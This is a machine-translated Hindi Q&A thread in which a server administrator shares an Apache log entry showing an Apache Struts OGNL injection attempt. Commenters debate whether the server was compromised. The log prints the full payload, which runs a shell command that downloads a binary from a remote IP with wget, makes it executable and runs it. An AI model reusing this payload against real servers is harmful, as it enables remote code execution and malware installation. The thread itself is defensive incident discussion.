मैं कुछ अपाचे लॉग देख रहा था और एक हमले के रूप में प्रकट होता है
core:error] [pid 20356] (36)File name too long: [client xxx.xxx.xxx.xxx:56856] AH00036: access to
/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).
(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).
(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).
(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().
exec('uname --m|grep x86_64 >> /dev/null || (pkill loop ; wget -O .loop http://111.90.158.225/d/ft32 && chmod 777 .loop && ./.loop)
&&(pkill loop ; wget -O .loop http://111.90.158.225/d/ft64 && chmod 777 .loop && ./.loop)').getInputStream()))).
(#w.close())}/index.action failed (filesystem path '/var/www/html/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).
(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).
(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).
(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('uname --m|grep x86_64 >> ')
निष्पादन रेखा:
exec('uname --m|grep x86_64 >> /dev/null || (pkill loop ; wget -O .loop http://111.90.158.225/d/ft32 && chmod 777 .loop && ./.loop)
&&(pkill loop ; wget -O .loop http://111.90.158.225/d/ft64 && chmod 777 .loop && ./.loop)')
मैंने फ़ाइल wget -O .loop http://111.90.158.225/d/ft64को सैंडबॉक्स में डाउनलोड किया है और यह एक संकलित / बाइनरी के रूप में दिखाई देता है इसलिए मैं अनिश्चित हूं कि फ़ाइल चलाने पर क्या करता है।
त्रुटि से कोई भी बता सकता है कि क्या मेरे पास भेद्यता है, या बेहतर अभी तक है, इस हमले के लिए कमजोरियों को कैसे देखें / सुरक्षा में सुधार करें?
- मैं अपाचे 2.4 पर एक सिम्फनी 4 एपीआई चला रहा हूं।
- मैं इस बात को लेकर अनिश्चित हूं कि हमले का प्रयास कैसे किया जा रहा है और वे कैसे
.execकमांड को चलाने की कोशिश कर रहे हैं
क्या इसकी रिपोर्ट करने के लिए कोई उचित जगह है?
2
यह सवाल serverfault.com के लिए बेहतर अनुकूल हो सकता है । मैं प्रवास के लिए झंडा फहराऊंगा।
—
क्रिस्टोफर बंधक 21
मेरे अनुभव में, अगर कोई मशीन समझौता किए जाने के सबूत दिखाती है, तो यह अब भरोसेमंद नहीं है और इसे फिर से बनाया जाना चाहिए। याद रखें, हो सकता है कि हमलावर ने उन अन्य चीजों को किया हो, जिन पर आपने ध्यान नहीं दिया है, या कुछ ट्रैक को सफलतापूर्वक कवर किया है। यह हमलावर को अन्य मशीनों को संक्रमित करने के लिए आपके डेटा सेंटर / व्यवसाय में एक टोले के रूप में भी काम कर सकता था, इसलिए दूसरों की समीक्षा करना एक अच्छा विचार है।
—
क्रिस्टोफर बंधक
मुझे यकीन नहीं है कि अगर यह वास्तव में मशीन से छेड़छाड़ किए जाने का सबूत दिखाता है ... मैं किसी भी वेबसर्वर के पास जा सकता हूं और एक url को हिट करने की कोशिश कर सकता हूं ... मेरा मानना है कि लॉग दिखा रहा है कि कोई व्यक्ति url पर गया था:
—
Shawn Northrop
http://example.com/${(#dm=@ognl.OgnlContext@....exec(...)/लेकिन अनिश्चित है मैं उस धारणा में सही हूं। लॉग भी उल्लेख करता है com.opensymphony.xwork2.ActionContext.containerजिसमें से इसका हिस्सा प्रतीत होता है Apache Struts। मैं का उपयोग नहीं कर रहा हूँApache Struts
@ChristopherHostage आप बस इसे ऑफ-टॉपिक के रूप में यहाँ और विषय पर सर्वर फॉल्ट के रूप में बंद करने के लिए मतदान कर सकते थे । यदि 4 अन्य लोग आपके साथ सहमत होते हैं तो यह पलायन हो जाएगा।
—
Mokubai
@ChristopherHostage "मेरे अनुभव में, अगर कोई मशीन समझौता होने का सबूत दिखाती है ..." इस मामले में गलत है। सभी अपाचे लॉग दर्शाते हैं कि सर्वर पर कुछ करने का प्रयास किया जाता है, न कि इस बात का सबूत है कि कुछ भी किया गया है। और जैसा कि मेरे उत्तर में परिलक्षित होता है , यह इंटरनेट पर एक वेब सर्वर पर हमला करने का एक प्रयास है जो अविश्वसनीय रूप से सामान्य है और वास्तव में इसके बारे में चिंता करने के लिए कुछ भी नहीं है।
—
जेकगोल्ड